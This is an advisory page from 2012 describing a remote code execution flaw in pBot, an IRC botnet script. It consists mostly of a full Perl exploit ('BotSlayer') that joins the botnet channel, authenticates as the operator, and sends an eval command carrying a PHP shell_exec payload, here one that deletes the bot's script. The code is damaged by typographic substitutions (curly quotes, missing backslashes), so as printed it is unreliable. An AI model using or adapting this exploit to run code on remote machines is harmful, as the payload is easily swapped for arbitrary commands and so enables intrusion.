pBot Remote Code Execution Exploit

Summary

pBot (‘*’ hostauth) suffers from remote code execution vunlerability

Credit:

The information has been provided by bwall.


Details

Vulnerable Systems:
 *pBot

use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

my $nickname = ‘BotSlayer’;
my $ident = ‘BotSlayer’;
my $fullname = ‘BotSlayer’;
$sel_client = IO::Select->new();

#configuration values from the bot source
$ircserver = ‘localhost’; #’server’
$ircserverpass = ”; #’pass’
my $ircport = ‘6667’; #’port’
#if ‘key’ is set, then add a space and the password to the chan name
my @channels = (‘#anonbxu’); #’chan’ and ‘chan2’
$botPass = ‘hello’; #’password’
$botTrigger = ‘.’; #’trigger’
#hostauth must be ‘*’
$loginCMD = ‘user’; #usually user or login

#payload – PHP code to run
#This version deletes the bots originating script, and dies
$phpEval = ‘shell_exec(‘rm -f ‘.$_SERVER[‘SCRIPT_NAME’]);exit();’;

$channelCount = scalar(@channels);

sub onJoin
{
my $channel = shift;
$channel = substr($channel, 1);
print ‘Joined $channeln’;
say($channel, $botTrigger.$loginCMD.’ $botPass’);
sleep(1);
say($channel, $botTrigger.’eval @BallastSec ‘.$phpEval);
print ‘Payload deliveredn’;
tryQuit();
}

sub tryQuit
{
$channelCount–;
if($channelCount == 0)
{
quit(‘whomp wha’);
}
}

sub sendraw
{
if ($#_ == ‘1’)
{
my $socket = $_[0];
print $socket ‘$_[1]n’;
}
else
{
print $IRC_cur_socket ‘$_[0]n’;
}
}

sub conn
{
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>’tcp’, PeerAddr=>’$ircserver_con’, PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket))
{
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{‘host’} = ‘$ircserver_con’;
$irc_servers{$IRC_cur_socket}{‘port’} = ‘$ircport_con’;
$irc_servers{$IRC_cur_socket}{‘nick’} = $mynick;
$irc_servers{$IRC_cur_socket}{‘myip’} = $IRC_socket->sockhost;
if($ircserverpass != ”)
{
sendraw(‘PASS ‘.$ircserverpass);
}
sendraw(‘NICK ‘.$mynick);
sendraw(‘USER $ident ‘.$IRC_socket->sockhost.’ $ircserver_con :$fullname’);
sleep 1;
}
}

sub parse
{
my $servarg = shift;
print $servarg.’n’;
if ($servarg =~ /^PING :(.*)/)
{
sendraw(‘PONG :$1’);
}
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) JOIN (.+)/)
{
my $channel = $4;
onJoin($channel);
}
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/)
{
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^01VERSION01$/)
{
notice(‘$pn’, ‘01VERSION BotSlayer by Ballast Security01’);
}
if ($args =~ /^(Q$mynickE|!a)s+(.*)/ )
{
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?)s+NICKs+:(S+)/i)
{
if (lc($1) eq lc($mynick))
{
$mynick=$4;
$irc_servers{$IRC_cur_socket}{‘nick’} = $mynick;
}
}
elsif ($servarg =~ m/^:(.+?)s+001s+(S+)s/i)
{
$mynick = $2;
$irc_servers{$IRC_cur_socket}{‘nick’} = $mynick;
$irc_servers{$IRC_cur_socket}{‘nome’} = ‘$1’;
foreach(@channels)
{
sendraw(‘JOIN $_’);
}
}
}
my $line_temp;
while(1)
{
while (!(keys(%irc_servers)))
{
conn($nickname, $ircserver, $ircport);
}
delete($irc_servers{”}) if (defined($irc_servers{”}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready)
{
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{‘nick’};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/n/, $msg);
$msg =~ s/rn$//;
for(my $c=0; $c<= $#lines; $c++)
{
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp=”;
$line =~ s/r$//;
parse(‘$line’);
}
}
}

sub say
{
return unless $#_ == 1;
sendraw(‘PRIVMSG $_[0] :$_[1]’);
}

sub notice
{
return unless $#_ == 1;
sendraw(‘NOTICE $_[0] :$_[1]’);
}

sub join
{
sendraw(‘JOIN $_[0]’);
}

sub part
{
sendraw(‘PART $_[0]’);
}

sub quit
{
sendraw(‘QUIT :$_[0]’);
exit;
}

Disclosure Timeline:
Published: 2012-08-01

Categories: Exploits